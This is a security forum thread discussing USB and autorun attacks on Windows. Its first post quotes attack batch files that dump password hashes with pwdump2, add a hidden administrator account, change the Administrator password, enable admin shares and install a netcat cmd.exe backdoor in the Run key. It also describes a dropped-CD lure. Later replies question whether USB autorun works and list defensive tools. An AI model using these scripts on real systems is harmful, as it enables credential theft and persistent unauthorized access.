USB + Autorun Attacks
Results 1 to 8 of 8

Thread: USB + Autorun Attacks

  1. #1
    Senior Member
    Join Date
    Sep 2003
    Posts
    500

    USB + Autorun Attacks

    For the past week there has been a nice discussion on Security focus on USB attacks . Basically what the hacker does is insert a USB keyring device into a computer. The USB device is loaded with a autorun.inf which points to several batch files or scripts that can

    -Add new Users
    -Change Admin Rights
    -Delete Passwords
    -Change Passwords
    -Use netcat to leave a backdoor
    -use pwdump to grap the sam file
    -use basic windows commands to grap system information
    -download trojens from a server

    The possibilities are quite endless. One person (sorry I forgot who it was) actually posted his scripts that he claims work fine and have worked fine on more than one occasion:
    *********<BOF test.bat>
    @echo off
    @start /min b.bat /B
    @exit
    <EOF test.bat>


    *********<BOF b.bat>
    @explorer .
    @echo off

    :isplaying Computer Information for my reference
    @echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
    @Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

    ::Adding a user for me )
    @net user /add __system32__ .z,xmcnvb /fullname:"IPC User"
    @net localgroup Administrators _system32_ /add

    ::Hide the Account from being shown on the welcome screen
    @reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
    NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t
    REG_DWORD /d 0 /f

    ::Enabling Admin Shares
    @reg add
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v
    @AutoSharewks /t reg_dword /d 1 /f

    ::Changing Admin Password
    @net user administrator .;[pl,mkoijnbhu

    ::Backdooring
    @copy nc.exe <nc directory>
    @cd c:
    @cd <nc directory>
    @reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
    "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f

    @echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
    @echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
    @echo ******************************************** >> Essential\DumpIt\sam.txt
    @cls
    @exit
    <EOF b.bat>
    Another person pointed out another crule idea. Leaving a CD on the ground with something like "Forth Quarter Layoffs" written on it. I assure you more than one person would instantly insert that in their computer and an autorun sequence could have their computer for lunch.

    Gadi Evron gives some ideas to stop these kind of attacks (one in particular I really like )

    Disabling USB all-together, virtually, by domain policy or removing the
    USB devices themselves, maybe even just filling the plugs with silicon
    or glue physically are some more drastic options which some
    organizations *might* take, but I don't see it as a very viable option
    for most.

    It all depends on your risk analysis. Cost vs. benefit, as always with
    security.

    There exist several tools to monitor a domain for when and if a USB
    device is connected to any remote machine, and of what kind. A simple
    web search should help you find some examples.
    Basically, just a heads up that this can and does happen very easily so watch out!

    ::links::

    Part of the Message:
    http://archives.neohapsis.com/archiv...4-05/0139.html

    How to make an Auto Run CD:
    http://msdn.microsoft.com/library/de...play_intro.asp

    USB Storage FAQ:
    http://www.microsoft.com/whdc/device...ge/usbfaq.mspx

    Solutions:
    DeviceLock - http://www.devicelock.com/
    LANDesk System Manager 8 - http://www.landesk.com/
    OptimAccess WorkSpy -
    SecureNT - http://www.securewave.com/
    http://www.sodatsw.cz/english /index.htm (description only in czech language)
    http://www.annoyances.org/exec/forum/winxp/1079209374
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

  2. #2
    Super Moderator: GMT Zone nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,178
    Funny old World, there have been several discussions on how to get a USB device to do what you describe.

    As far as I have been able to determine:

    Basically what the hacker does is insert a USB keyring device into a computer. The USB device is loaded with a autorun.inf which points to several batch files or scripts that can
    Won't work Basically the USB device is mounted, and that is that. You need to access it and launch any programs either remotely, or from the PC itself.

    Now, there are SOME USB devices that are supplied with software that runs in the background, and monitors for the mounting of the drive, that would permit the use of an autorun script. This software is device specific, and would need to be loaded onto the target machine first. So I do not believe that it is as simple as it has been presented.

    If anyone knows different please tell me how, as I know of several people who would find it useful for distributing legitimate software.

    Cheers
    If you cannot do someone any good: don't do them any harm....
    As long as you did this to one of these, the least of my little ones............you did it unto Me.
    What profiteth a man if he gains the entire World at the expense of his immortal soul?

  3. #3
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,324
    These discussions were probably all spurred from an article in the latest 2600.

    Thats where I got my idea on how to get the patches out.
    Instead of using it for malicious intent... I was trying to dream up good uses for it.

    I've tried 3 different types of flash "keyrings" now. None of them will run either an autorun copied from a cd with the correct executables or a custom autorun.inf and something as simple as a batch file.

    I'll have to check out some of those discussions... but as nihil said... we've found that the autorun feature is controlled by a utility that comes with the flash drive that runs in the background.

    It is much like a sony microvault... you insert it and when you first want to use it, it will install a driver and utility that runs in the background and looks for the microvault to be inserted. (System has to be rebooted.) Then it will launch the program to enter the password and unlock/decrypt the drive contents when the utility detects the microvault has ben inserted.
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  4. #4
    Super Moderator: GMT Zone nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,178
    Hi phish~

    I gave it another try. No joy at all with Win98SE and WinME............assigns a drive letter and puts a little icon in the system tray.

    Closest I got was with my XP Pro box, where the AMIBIOS will let me select a USB drive as a boot device. That would get round the special device dependent utility, but that is in the BIOS not the OS. And you would have to change the boot sequence.

    I must look at an AWARD BIOS. I am pretty sure that it is not available as an option with machines from the major suppliers like Dell, HP, IBM. This was one I built myself, so it has the full uncensored BIOS

    There is no such option with the two older machines, but their BIOSes predate USB drives. I am allowed flopticals (ZIP & LS120)

    The AMIBIOS is quite comprehensive, as I recall it allows me 3.5" floppy, ZIP, LS 120, DVD, CD, four HDDs and Network.

    Cheers
    If you cannot do someone any good: don't do them any harm....
    As long as you did this to one of these, the least of my little ones............you did it unto Me.
    What profiteth a man if he gains the entire World at the expense of his immortal soul?

  5. #5
    Senior Member RoadClosed's Avatar
    Join Date
    Jun 2003
    Posts
    3,834
    The first day I saw a USB device that worked I said "Oh **** that has potential" and then they got cheap and I said "Oh **** how to I lock these things down and keep my system secure." SO I implemented ways to tell me when passwords are changed etc. I am not aware of a all emcompassing domain policy that will kill USB. One can disable drives and make the process of geting files on or off a USB memory unit a little harder but this effects other devices outside of usb. There is no catch all switch to turn USB on and off at whim. At least not built into win2k as mentioned. Not even through domain policy, now on Win2003 I don't have a clue.

    I use a blue tooth adapter to sync some wireless devices to any pc I am at. How is that for an open gateway? If I need to use the internet on my PIM, bam.
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

  6. #6
    Senior Member
    Join Date
    Sep 2003
    Posts
    500
    Yeah, I actually posted this here after reading lots of things (including the 2600) and I couldn't get the autorun feature to work. The best I got was that my autorun would replace the drive icon in explorer. I still don't understand why part of the autorun would work and the latter not. I found this and it seems possible to implement this somehow, however I don't know how.

    The IO device must send a WM_DEVICECHANGE message to the the system. However, only CD-rom devices and some floppy based media do this. I don't think USB keyrings do this. Any ideas?

    ::Stuff::

    WM_DEVICECHANGE Guide
    http://msdn.microsoft.com/library/de...vicechange.asp

    ::Edit::

    From Microsoft

    AutoRun for Other Types of Storage Media

    AutoRun is primarily intended for public distribution of applications on CD-ROM and DVD-ROM. However, it is often useful to enable AutoRun on other types of removable storage media. This feature is typically used simplify the debugging of AutoRun.inf files. AutoRun only works on removable storage devices when the following criteria are met:

    * The device must have AutoRun-compatible drivers. To be AutoRun-compatible, a driver must notify the system that a disk has been inserted by sending a WM_DEVICECHANGE message.
    * The root directory of the inserted media must contain an Autorun.inf file.
    * The device must not have AutoRun disabled through the registry.
    * The foreground application has not suppressed AutoRun.
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

  7. #7
    Senior Member
    Join Date
    Jun 2002
    Posts
    174
    I read something like that back in the day to get past the Windows Screensaver (in Win98 days). You just put in a CD with the appropriate autorun file and programs, stick in a floppy, and let it copy all relevant information over for you. This worked because Windows executes the Autorun stuff even while a password protected screensaver was going. When I read it, I was sure it could work with other things as well, but never tried them.

    For a while, I was going to try something similar with a CD and USB device, until I found out that secure systems usually mount USB flash drives in read-only mode (for low security users), so that nothing could be taken out of the environment.
    I\'m back.

  8. #8
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    It is possible to boot of USB devices if the BIOS is set up correctly, This is done quite often with Linux, I have seen a few distros created to fit on a USB keyring.

    I have tried to autorun a USB smart media card reader and a USB keyring thing, neither have worked.

    Im gonna give a few things a try and let you know, I agree with nihil about the mounting of the devices though.

    i2c

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides